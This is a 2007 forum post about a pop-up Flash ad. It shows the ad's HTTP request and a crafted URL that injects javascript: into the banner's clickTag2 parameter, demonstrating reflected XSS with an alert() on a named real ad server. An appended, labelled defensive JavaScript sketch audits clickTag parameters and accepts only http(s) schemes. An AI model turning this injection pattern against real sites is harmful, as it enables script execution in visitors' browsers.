Thread: Pop-ups?
08-21-07, 04:56 PM   #31
evilghost

Re: Pop-ups?

Here it is over the wire. As you can see, I was right about the cookie.

Code:
GET /static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:DL_Close(); HTTP/1.1
Accept: */*
Referer: http://www.nvnews.net/vbulletin/
x-flash-version: 9,0,16,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: amch.questionmarket.com
Connection: Keep-Alive
Cookie: linkjumptest=1

Here's the direct link to the annoying, worthless flash that flies across your screen:

Code:
http://amch.questionmarket.com/static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:DL_Close();

And here's me owning that same link with a blatant XSS vulnerability:

Code:
http://amch.questionmarket.com/static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:alert('evilghost is your daddy');

Go ahead, open it, and click the 'Close' button.

MikeC, if you want to engage intellitxt, this post is what you need. It's the direct URL to the flash they are serving up.
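
The defender's side of the links in the post above, as an added example that is not part of the original post: the banner acts on whatever URI arrives in clickTag and clickTag2, including a javascript: one, so this sketch audits those parameters and accepts only absolute http(s) targets. The function names and the ads.example / advertiser.example URLs are assumptions made for illustration; the first sample URL is the direct link quoted in the post.

```javascript
// Added example: audit clickTag-style parameters of a Flash ad URL.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const CLICKTAG_NAME = /^clicktag\d*$/i; // clickTag, clickTag2, clickTAG, ...

// Resolve the scheme the way a browser's URL parser would: leading
// whitespace is stripped and the scheme is lower-cased, so disguised
// spellings of "javascript:" are still recognised.
function schemeOf(value) {
  try {
    return new URL(value).protocol;
  } catch {
    return null; // relative, protocol-relative or unparseable: not absolute
  }
}

// Return one finding per clickTag parameter found in the request URL.
function auditClickTags(requestUrl) {
  const findings = [];
  for (const [name, value] of new URL(requestUrl).searchParams) {
    if (!CLICKTAG_NAME.test(name)) continue;
    const scheme = schemeOf(value);
    const allowed = scheme !== null && ALLOWED_SCHEMES.has(scheme);
    findings.push({ name, value, scheme, allowed });
  }
  return findings;
}

// True only when every clickTag parameter is an absolute http(s) URL
// (a URL with no clickTag parameters at all also passes).
function isSafeAdUrl(requestUrl) {
  return auditClickTags(requestUrl).every((f) => f.allowed);
}

// Direct link quoted in the post.
const PAGE_URL =
  "http://amch.questionmarket.com/static/sc_trans2_black_li-350x250-1l-eng-nul.swf" +
  "?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:DL_Close();";

// Constructed sample: the same kind of banner with plain https click targets.
const CONSTRUCTED_URL =
  "http://ads.example/banner.swf" +
  "?clickTag=https%3A%2F%2Fadvertiser.example%2Flanding" +
  "&clickTag2=https%3A%2F%2Fadvertiser.example%2Fclose";

for (const u of [PAGE_URL, CONSTRUCTED_URL]) {
  console.log(isSafeAdUrl(u) ? "ok    " : "reject", auditClickTags(u));
}
```

The same allowlist belongs inside the banner itself, before it navigates on a click; a filter in front of the ad server only covers requests that pass through it.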